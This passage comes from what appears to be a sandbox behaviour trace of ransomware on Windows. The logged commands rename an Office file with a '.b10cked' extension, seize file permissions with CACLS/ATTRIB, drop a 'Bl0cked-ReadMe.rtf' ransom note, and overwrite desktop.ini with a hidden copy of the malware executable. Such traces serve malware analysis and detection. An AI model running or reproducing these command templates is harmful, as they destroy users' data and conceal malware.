hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.476] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x3960 [0176.476] SetFilePointer (in: 
hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ed00*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ed00*=0) returned 0x0 [0176.477] SetFilePointer (in: hFile=0x120, lDistanceToMove=-1256, lpDistanceToMoveHigh=0x12ecec*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x3478 [0176.477] ReadFile (in: hFile=0x120, lpBuffer=0x12ed94, nNumberOfBytesToRead=0x4e8, lpNumberOfBytesRead=0x12ed2c, lpOverlapped=0x0 | out: lpBuffer=0x12ed94*, lpNumberOfBytesRead=0x12ed2c*=0x4e8, lpOverlapped=0x0) returned 1 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ecec*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ecec*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x3960 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec60*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec60*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec4c*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec4c*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x3960 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec58*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec58*=0) returned 0x0 [0176.574] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, 
dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0176.574] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1caf, lpOverlapped=0x0) returned 1 [0176.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ec78*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x0 [0176.575] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1caf, lpOverlapped=0x0) returned 1 [0176.575] SetFilePointer (in: hFile=0x120, lDistanceToMove=-7343, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1cb1 [0176.575] ReadFile (in: hFile=0x120, lpBuffer=0x1273a68, nNumberOfBytesToRead=0x1caf, lpNumberOfBytesRead=0x12ec08, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesRead=0x12ec08*=0x1caf, lpOverlapped=0x0) returned 1 [0176.577] SetFilePointer (in: hFile=0x120, lDistanceToMove=-7343, lpDistanceToMoveHigh=0x12ec78*=-1, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ec78*=0) returned 0x1cb1 [0176.577] WriteFile (in: hFile=0x120, lpBuffer=0x1273a68*, nNumberOfBytesToWrite=0x1caf, lpNumberOfBytesWritten=0x12ec1c, lpOverlapped=0x0 | out: lpBuffer=0x1273a68*, lpNumberOfBytesWritten=0x12ec1c*=0x1caf, lpOverlapped=0x0) returned 1 [0176.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0176.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="XLSLICER.DLL.trx_dll", cchWideChar=20, lpMultiByteStr=0x1328744, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: 
lpMultiByteStr="XLSLICER.DLL.trx_dll", lpUsedDefaultChar=0x0) returned 20 [0176.582] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x12ece0*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x12ece0*=0) returned 0x3960 [0176.582] WriteFile (in: hFile=0x120, lpBuffer=0x12f27c*, nNumberOfBytesToWrite=0x4e8, lpNumberOfBytesWritten=0x12ed20, lpOverlapped=0x0 | out: lpBuffer=0x12f27c*, lpNumberOfBytesWritten=0x12ed20*=0x4e8, lpOverlapped=0x0) returned 1 [0176.582] CloseHandle (hObject=0x120) returned 1 [0176.583] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\XLSLICER.DLL.trx_dll", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX") returned 0x3c [0176.584] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", lpszShortPath=0x1273ccc, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\") returned 0x30 [0176.584] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12ecec*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12ecdc | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C move /Y \"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLIC~1.TRX\" 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\OFFICE\\UICAPT~1\\3082\\XLSLICER.DLL.trx_dll.b10cked\"", lpProcessInformation=0x12ecdc*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa40, dwThreadId=0xbbc)) returned 1 [0176.631] CloseHandle (hObject=0x1b4) returned 1 [0176.631] CloseHandle (hObject=0x120) returned 1 [0176.631] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0176.631] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0176.631] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount1=52, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 2 [0176.631] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.631] ReleaseMutex (hMutex=0xf8) returned 1 [0176.631] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.631] ReleaseMutex (hMutex=0xf8) returned 1 [0176.631] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.632] ReleaseMutex (hMutex=0xf8) returned 1 [0176.632] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0176.632] ReleaseMutex (hMutex=0xf8) returned 1 [0176.632] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0176.634] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default 
Pictures\\usertile10.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", lpFilePart=0x12eab4*="usertile10.bmp") returned 0x52 [0176.634] GetLastError () returned 0x5 [0176.634] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xab58\x131\xed01\x12") returned 0x13 [0176.635] LocalFree (hMem=0x1c6cc8) returned 0x0 [0176.635] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0176.635] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0176.635] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0176.635] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0176.635] CharUpperBuffW (in: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"", cchLength=0x47 | out: lpsz="CACLS \"[FILENAME]\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"[FILENAME]\"") returned 0x47 [0176.635] CharUpperBuffW (in: lpsz="[FILENAME]", cchLength=0xa | out: lpsz="[FILENAME]") returned 0xa [0176.635] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fbb4*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, 
dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fba4 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp\"", lpProcessInformation=0x12fba4*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xa5c, dwThreadId=0xb74)) returned 1 [0176.641] WaitForSingleObject (hHandle=0x1b4, dwMilliseconds=0xffffffff) returned 0x0 [0177.442] CloseHandle (hObject=0x1b4) returned 1 [0177.442] CloseHandle (hObject=0x120) returned 1 [0177.442] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0177.442] ReleaseMutex (hMutex=0xf8) returned 1 [0177.443] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0177.443] ReleaseMutex (hMutex=0xf8) returned 1 [0177.443] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0177.443] ReleaseMutex (hMutex=0xf8) returned 1 [0177.443] WaitForSingleObject (hHandle=0xf8, dwMilliseconds=0xffffffff) returned 0x0 [0177.443] ReleaseMutex (hMutex=0xf8) returned 1 [0177.443] CreateFileW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\usertile10.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0177.443] GetFullPathNameW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", nBufferLength=0x104, lpBuffer=0x12eab8, lpFilePart=0x12eab4 | out: lpBuffer="C:\\Users\\All 
Users\\Microsoft\\User Account Pictures\\Default Pictures\\usertile10.bmp", lpFilePart=0x12eab4*="usertile10.bmp") returned 0x52 [0177.443] GetLastError () returned 0x5 [0177.443] FormatMessageW (in: dwFlags=0x3300, lpSource=0x0, dwMessageId=0x5, dwLanguageId=0x0, lpBuffer=0x12ecc8, nSize=0x0, Arguments=0x0 | out: lpBuffer="\x6cc8\x1c\xed10\x12\xca84\x48\xed20\x12\xcad0\x48\xed10\x12\xfbac\x12\xadc8\x131\xed01\x12") returned 0x13 [0177.443] LocalFree (hMem=0x1c6cc8) returned 0x0 [0177.443] LoadStringW (in: hInstance=0x400000, uID=0xff84, lpBuffer=0x12cc84, cchBufferMax=4096 | out: lpBuffer="Cannot open file \"%s\". %s") returned 0x19 [0177.443] RaiseException (dwExceptionCode=0xeedfade, dwExceptionFlags=0x1, nNumberOfArguments=0x7, lpArguments=0x12ecb8) [0177.443] RtlUnwind (TargetFrame=0x12ed20, TargetIp=0x40675c, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0177.444] RtlUnwind (TargetFrame=0x12ed44, TargetIp=0x4068e4, ExceptionRecord=0x12e7ec, ReturnValue=0x0) [0177.444] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0177.444] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\OFFICE\\UICaptions\\3082\\", cchLength=0x34 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\") returned 0x34 [0177.444] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\ALL USERS\\MICROSOFT\\OFFICE\\UICAPTIONS\\3082\\", cchCount2=52) returned 3 [0177.444] CharUpperBuffW (in: lpsz="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", cchLength=0x44 | out: lpsz="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\") returned 0x44 [0177.444] CharUpperBuffW (in: lpsz="C:\\Users\\EEBsYm5\\Desktop\\", cchLength=0x19 | out: 
lpsz="C:\\USERS\\EEBSYM5\\DESKTOP\\") returned 0x19 [0177.444] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="C:\\USERS\\ALL USERS\\MICROSOFT\\USER ACCOUNT PICTURES\\DEFAULT PICTURES\\", cchCount1=68, lpString2="C:\\USERS\\EEBSYM5\\DESKTOP\\", cchCount2=25) returned 1 [0177.444] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF") returned 0x2d [0177.445] CharUpperBuffW (in: lpsz="type \"[FROM_PATH]\" > \"[TO_PATH]\"", cchLength=0x20 | out: lpsz="TYPE \"[FROM_PATH]\" > \"[TO_PATH]\"") returned 0x20 [0177.445] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0177.445] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\") returned 0x2d [0177.445] CharUpperBuffW (in: lpsz="type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"[TO_PATH]\"", cchLength=0x42 | out: lpsz="TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\BL0CKE~1.RTF\" > \"[TO_PATH]\"") returned 0x42 [0177.446] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0177.446] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb94*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, 
hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb84 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\Bl0cked-ReadMe.rtf\"", lpProcessInformation=0x12fb84*(hProcess=0x1b4, hThread=0x120, dwProcessId=0xcc0, dwThreadId=0xac4)) returned 1 [0177.447] CloseHandle (hObject=0x1b4) returned 1 [0177.447] CloseHandle (hObject=0x120) returned 1 [0177.447] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\bl0cked-readme.rtf")) returned 0xffffffff [0177.448] GetLastError () returned 0x2 [0177.448] CopyFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), lpNewFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\bl0cked-readme.rtf"), bFailIfExists=0) returned 1 [0177.697] GetFileAttributesW (lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\all users\\microsoft\\user account pictures\\default pictures\\bl0cked-readme.rtf")) returned 0x2020 [0177.697] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0177.697] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0177.697] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0177.697] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) 
returned 2 [0177.697] GetShortPathNameW (in: lpszLongPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\XEY8d7zI.exe", lpszShortPath=0x1273a8c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe") returned 0x36 [0177.697] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"[FROM_PATH]\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0x87 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"[FROM_PATH]\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0x87 [0177.697] CharUpperBuffW (in: lpsz="[FROM_PATH]", cchLength=0xb | out: lpsz="[FROM_PATH]") returned 0xb [0177.697] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures\\", lpszShortPath=0x123027c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\") returned 0x2d [0177.698] CharUpperBuffW (in: lpsz="attrib -r -s -h \"[TO_PATH]\" & del /f /q \"[TO_PATH]\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"[TO_PATH]\" && attrib +h \"[TO_PATH]\" && attrib +h \"[TO_DIR]\"", cchLength=0xb2 | out: lpsz="ATTRIB -R -S -H \"[TO_PATH]\" & DEL /F /Q \"[TO_PATH]\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"[TO_PATH]\" && ATTRIB +H \"[TO_PATH]\" && ATTRIB +H \"[TO_DIR]\"") returned 0xb2 [0177.698] CharUpperBuffW (in: lpsz="[TO_PATH]", cchLength=0x9 | out: lpsz="[TO_PATH]") returned 0x9 [0177.698] GetShortPathNameW (in: lpszLongPath="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpszShortPath=0x123003c, cchBuffer=0x103 | out: lpszShortPath="C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1") returned 0x2c [0177.699] CharUpperBuffW (in: lpsz="attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"[TO_DIR]\"", cchLength=0x16e | out: lpsz="ATTRIB -R -S -H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\DESKTOP.INI\" & DEL /F /Q \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\DESKTOP.INI\" & TYPE \"C:\\USERS\\EEBSYM5\\APPDATA\\ROAMING\\VMFCCE~1\\XEY8D7ZI.EXE\" > \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\DESKTOP.INI\" && ATTRIB +H \"C:\\USERS\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\DESKTOP.INI\" && ATTRIB +H \"[TO_DIR]\"") returned 0x16e [0177.699] CharUpperBuffW (in: lpsz="[TO_DIR]", cchLength=0x8 | out: lpsz="[TO_DIR]") returned 0x8 [0177.699] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x30, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12fb88*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb78 | out: lpCommandLine="\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h 
\"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\MICROS~1\\USERAC~1\\DEFAUL~1\"", lpProcessInformation=0x12fb78*(hProcess=0x120, hThread=0x1b4, dwProcessId=0xb9c, dwThreadId=0xbb8)) returned 1 [0177.739] WaitForSingleObject (hHandle=0x120, dwMilliseconds=0xffffffff) returned 0x0 [0178.455] CloseHandle (hObject=0x120) returned 1 [0178.455] CloseHandle (hObject=0x1b4) returned 1 [0178.455] CompareStringW (Locale=0x409, dwCmpFlags=0x0, lpString1="\\", cchCount1=1, lpString2="\\", cchCount2=1) returned 2 [0178.455] FindFirstFileW (in: lpFileName="C:\\Users\\All Users\\Microsoft\\User Account Pictures\\Default Pictures", lpFindFileData=0x12f9e4 | out: lpFindFileData=0x12f9e4) returned 0x1fec00 [0178.455] FindClose (in: hFindFile=0x1fec00 | out: hFindFile=0x1fec00) returned 1 [0178.455] GetTickCount () returned 0x33a60 [0178.455] QueryPerformanceCounter (in: lpPerformanceCount=0x12fbfc | out: lpPerformanceCount=0x12fbfc*=23524469706) returned 1 [0178.456] 